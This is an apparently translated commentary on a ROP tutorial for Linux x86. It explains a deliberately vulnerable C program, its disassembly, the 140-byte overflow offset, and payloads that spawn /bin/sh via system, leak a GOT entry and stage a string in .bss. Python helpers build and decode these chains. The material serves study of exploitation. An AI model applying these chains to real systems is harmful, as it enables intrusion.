A step-by-step study of the linux_x86 of ROP

Source: Internet
Author: User

0x00

This article only adds commentary to Zhengmi's (蒸米) "A step-by-step study of ROP: linux_x86". Read that article first, and come back to this one when you run into questions.

After reading both articles you should understand ROP (return-oriented programming), DEP (non-executable stack), ASLR (address space layout randomization), the stack protector (stack canaries) and memory leaks.


0x01

The first question: why do we construct the string "A"*140 + ret, and where does the 140 come from?

To answer this we need to disassemble level1. The source of level1.c is:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function() {
    char buf[128];                  /* the declared size was lost in extraction; 128 is what the original level1.c declares */
    read(STDIN_FILENO, buf, 256);   /* reads up to 256 bytes into the buffer: this is the overflow */
}

int main(int argc, char** argv) {
    vulnerable_function();
    write(STDOUT_FILENO, "Hello, world\n", 13);
}
Disassembling with objdump -d level1 gives:

08048404 <vulnerable_function>:
 8048404: 55                      push   %ebp
 8048405: 89 e5                   mov    %esp,%ebp
 8048407: 81 ec 98 00 00 00       sub    $0x98,%esp            // esp -= 0x98
 804840d: c7 44 24 08 00 01 00    movl   $0x100,0x8(%esp)      // third argument: 256
 8048414: 00
 8048415: 8d 85 78 ff ff ff       lea    -0x88(%ebp),%eax      // buf lives at ebp-0x88
 804841b: 89 44 24 04             mov    %eax,0x4(%esp)        // second argument: address of buf
 804841f: c7 04 24 00 00 00 00    movl   $0x0,(%esp)           // first argument: STDIN_FILENO
 8048426: e8 e5 fe ff ff          call   8048310 <read@plt>
 804842b: c9                      leave
 804842c: c3                      ret

0804842d <main>:
 804842d: 55                      push   %ebp
 804842e: 89 e5                   mov    %esp,%ebp
 8048430: 83 e4 f0                and    $0xfffffff0,%esp
 8048433: 83 ec 10                sub    $0x10,%esp
 8048436: e8 c9 ff ff ff          call   8048404 <vulnerable_function>
 804843b: c7 44 24 08 0d 00 00    movl   $0xd,0x8(%esp)
 8048442: 00
 8048443: c7 44 24 04 30 85 04    movl   $0x8048530,0x4(%esp)
 804844a: 08
 804844b: c7 04 24 01 00 00 00    movl   $0x1,(%esp)
 8048452: e8 e9 fe ff ff          call   8048340 <write@plt>
 8048457: c9                      leave
 8048458: c3                      ret
 8048459: 90                      nop
 804845a: 90                      nop
 804845b: 90                      nop
 804845c: 90                      nop
 804845d: 90                      nop
 804845e: 90                      nop
 804845f: 90                      nop
When main executes call 8048404 <vulnerable_function>, the stack frame described by the comments above is built: the call pushes the return address, the prologue pushes the caller's ebp right below it, and buf starts 0x88 bytes below that saved ebp. So buf is 0x88 = 136 bytes from the saved ebp and 136 + 4 = 140 bytes from the return address, which is where the 140 comes from:
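As an added example (not code from the original article or from Zhengmi), the following script performs the same derivation from the objdump listing: it finds the displacement in the lea that forms buf's address, reads the length passed to read() from the argument slot at 0x8(%esp), and reports whether that length reaches past the return address. The listing excerpt embedded in the script is copied from the disassembly above; the regular expressions assume gcc's 32-bit frame layout (buf at ebp-disp, arguments stored at (%esp), 0x4(%esp), 0x8(%esp)).

```python
import re

# Constructed excerpt of the objdump listing above: only the lines the
# calculation needs, in objdump's own format.
LISTING = """\
 8048407: 81 ec 98 00 00 00       sub    $0x98,%esp
 804840d: c7 44 24 08 00 01 00    movl   $0x100,0x8(%esp)
 8048415: 8d 85 78 ff ff ff       lea    -0x88(%ebp),%eax
 804841b: 89 44 24 04             mov    %eax,0x4(%esp)
 804841f: c7 04 24 00 00 00 00    movl   $0x0,(%esp)
 8048426: e8 e5 fe ff ff          call   8048310 <read@plt>
"""

# buf's address is formed as ebp - disp and handed to read() as its 2nd argument.
LEA_RE = re.compile(r"lea\s+-0x([0-9a-f]+)\(%ebp\),%eax")
# Immediate arguments are stored at (%esp), 0x4(%esp), 0x8(%esp): arg0, arg1, arg2.
IMM_ARG_RE = re.compile(r"movl\s+\$0x([0-9a-f]+),(?:0x([0-9a-f]+))?\(%esp\)")

def frame_layout(listing):
    """Return (bytes from buf up to the saved ebp, length passed to read)."""
    buf_below_ebp = None
    imm_args = {}
    for line in listing.splitlines():
        m = LEA_RE.search(line)
        if m:
            buf_below_ebp = int(m.group(1), 16)
        m = IMM_ARG_RE.search(line)
        if m:
            slot = int(m.group(2) or "0", 16) // 4   # 0x8(%esp) -> slot 2
            imm_args[slot] = int(m.group(1), 16)
    return buf_below_ebp, imm_args.get(2)

def offset_to_return_address(buf_below_ebp):
    """buf ... saved ebp (4 bytes, at ebp) ... return address (at ebp+4)."""
    return buf_below_ebp + 4

def overflow_report(listing):
    buf_below_ebp, read_len = frame_layout(listing)
    to_ret = offset_to_return_address(buf_below_ebp)
    return {
        "buf_at": f"ebp-0x{buf_below_ebp:x}",
        "bytes_to_saved_ebp": buf_below_ebp,
        "bytes_to_return_address": to_ret,
        "read_len": read_len,
        # a read longer than the distance to the return address can rewrite it
        "return_address_reachable": read_len is not None and read_len > to_ret,
        "bytes_past_return_address": max(0, (read_len or 0) - to_ret - 4),
    }

if __name__ == "__main__":
    for key, value in overflow_report(LISTING).items():
        print(f"{key}: {value}")
```

For the listing above the report gives 136 bytes to the saved ebp, 140 bytes to the return address, and a read length of 256, so the return address is reachable and 112 further bytes land beyond it; the same check applied to a listing whose read length is at most the buffer's distance from the return address reports it as not reachable.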



0x02

payload = 'A'*140 + p32(system_addr) + p32(ret) + p32(binsh_addr). This chain calls system("/bin/sh") and then returns to ret to continue execution; that is, binsh_addr is system's argument. Why is it laid out this way?

Let's look at how 8048426: e8 e5 fe ff ff call 8048310 <read@plt> picks up its arguments.


When read is called, the return address (the saved EIP) is pushed first and then read's prologue pushes EBP, so the two sit one above the other on the stack; to fetch its first argument, read has to look 8 bytes above them, at 8(%esp) (ebp+8 after the prologue).

Reading payload = 'A'*140 + p32(system_addr) + p32(ret) + p32(binsh_addr) the same way: once the overflow has replaced the return address with system_addr, the ret of vulnerable_function "calls" system with ret in the slot where system expects its return address and binsh_addr in the slot where it expects its first argument, as in the small figure on the right:


This shows why /bin/sh ends up as system's first argument and why system("/bin/sh") returns to ret after it finishes.


0x03

payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) + p32(got_write) + p32(4). Which call does this line perform?

write(STDOUT_FILENO, got_write, 4);

That is, it writes the 4-byte address stored in write's GOT entry to standard output, and then returns to vulfun_addr.


0x04

In "A step-by-step study of ROP: linux_x86", what does this memory-leak part mean?

payload2  = 'a'*140 + p32(plt_read) + p32(pppr) + p32(0) + p32(bss_addr) + p32(8)
payload2 += p32(system_addr) + p32(vulfun_addr) + p32(bss_addr)

The first line reads /bin/sh from standard input into the .bss segment; it corresponds to read(STDIN_FILENO, bss_addr, 8).

Then read returns to pppr, whose pop; pop; pop; ret skips the three argument cells p32(0) + p32(bss_addr) + p32(8) and lands on system_addr; from there the flow is the same as the original payload, with bss_addr (which now holds /bin/sh) as system's argument.
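The reasoning in 0x02, 0x03 and 0x04 is the same every time: the word that a ret pops becomes the next function, that function sees the following word as its own return address and the words after it as arg0, arg1, ..., and a pop-pop-pop-ret placed in the return slot throws away exactly the argument cells so the chain can continue. The script below is an added example (not code from the original article or from Zhengmi) that labels every 4-byte cell of a chain with that role and flags two things a reader checks by hand: a gadget that pops a different number of cells than the previous call has arguments, and a return target that is itself a function, which then sees an argument cell as its return address (the vulfun_addr case in payload1 and payload2, which only works because vulnerable_function is overflowed again). All addresses are constructed placeholders, p32 is a local stand-in for the pwntools helper the payloads use, and the argument counts and pop counts are supplied in tables.

```python
import struct

def p32(v):
    """Little-endian 32-bit pack, the same as the pwntools p32 used by the payloads."""
    return struct.pack("<I", v)

PAD = 140   # bytes from buf to the return address, as derived in 0x01

# Constructed placeholder addresses (a real chain reads these from the binary / libc).
SYSTEM_ADDR = 0x11111111
PLT_READ    = 0x22222221
PLT_WRITE   = 0x22222222
GOT_WRITE   = 0x22222223
PPPR        = 0x33333333        # a "pop; pop; pop; ret" gadget
BSS_ADDR    = 0x44444444
BINSH_ADDR  = 0x44444448
RET_ADDR    = 0x55555555        # the "ret" value of 0x02: whatever runs after system
VULFUN_ADDR = 0x08048404        # vulnerable_function, from the listing in 0x01

SYMBOLS = {SYSTEM_ADDR: "system", PLT_READ: "read@plt", PLT_WRITE: "write@plt",
           GOT_WRITE: "got_write", PPPR: "pppr", BSS_ADDR: "bss_addr",
           BINSH_ADDR: "binsh_addr", RET_ADDR: "ret", VULFUN_ADDR: "vulnerable_function"}
FUNC_ARGS = {SYSTEM_ADDR: 1, PLT_READ: 3, PLT_WRITE: 3, VULFUN_ADDR: 0}  # cdecl argument counts
GADGET_POPS = {PPPR: 3}                                               # cells each gadget pops

def sym(v):
    return SYMBOLS.get(v, hex(v))

def build(*words):
    """Padding up to the return address, then the chain words, as in the payloads above."""
    return b"A" * PAD + b"".join(p32(w) for w in words)

# The three chains from the text, built from the placeholder addresses.
PAYLOAD  = build(SYSTEM_ADDR, RET_ADDR, BINSH_ADDR)
PAYLOAD1 = build(PLT_WRITE, VULFUN_ADDR, 1, GOT_WRITE, 4)
PAYLOAD2 = build(PLT_READ, PPPR, 0, BSS_ADDR, 8) + p32(SYSTEM_ADDR) + p32(VULFUN_ADDR) + p32(BSS_ADDR)

def decode_chain(payload, pad=PAD, funcs=FUNC_ARGS, gadgets=GADGET_POPS):
    """Label each 4-byte cell after the padding with its role under cdecl.

    Returns ([(offset_in_payload, role), ...], [notes]); notes flag pop-count
    mismatches and return targets that are functions rather than gadgets."""
    words = [struct.unpack("<I", payload[j:j + 4])[0]
             for j in range(pad, len(payload) - 3, 4)]
    roles, notes, i = {}, [], 0
    while i < len(words):
        f = words[i]                         # the word the current ret pops
        if f not in funcs:
            roles[i] = f"ret -> {sym(f)} (not a known function; chain ends here)"
            break
        k = funcs[f]
        roles[i] = f"ret -> {sym(f)}"
        if i + 1 >= len(words):
            notes.append(f"{sym(f)} has no return-address cell")
            break
        r = words[i + 1]                     # what f sees as its return address
        roles[i + 1] = f"{sym(f)} returns to {sym(r)}"
        for a in range(k):                   # f's arguments follow its return slot
            if i + 2 + a < len(words):
                roles[i + 2 + a] = f"arg{a} of {sym(f)} = {sym(words[i + 2 + a])}"
            else:
                notes.append(f"arg{a} of {sym(f)} lies beyond the payload")
        if r in gadgets:
            n = gadgets[r]
            if n != k:
                notes.append(f"{sym(r)} pops {n} cells but {sym(f)} takes {k} argument(s)")
            i += 2 + n                       # the gadget's ret pops the cell after the popped ones
        elif r in funcs:
            notes.append(f"{sym(r)} sees arg0 of {sym(f)} as its own return address; "
                         "the chain continues only if it re-hijacks control, as "
                         "vulnerable_function does when it is overflowed again")
            break
        else:
            break                            # unknown return target: nothing more to decode
    return [(pad + 4 * j, roles[j]) for j in sorted(roles)], notes

if __name__ == "__main__":
    for name, chain in (("payload", PAYLOAD), ("payload1", PAYLOAD1), ("payload2", PAYLOAD2)):
        cells, notes = decode_chain(chain)
        print(name)
        for offset, role in cells:
            print(f"  +{offset}: {role}")
        for note in notes:
            print(f"  note: {note}")
```

For payload2 the decoder labels offset 140 as the jump to read@plt, 144 as read's return slot holding pppr, 148 to 156 as read's three arguments (0, bss_addr, 8), 160 as the jump to system, 164 as system's return slot holding vulnerable_function and 168 as system's argument bss_addr; the only note is the one about vulnerable_function taking an argument cell as its return address. Swapping pppr into the return slot of a one-argument call produces the pop-count mismatch note instead.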

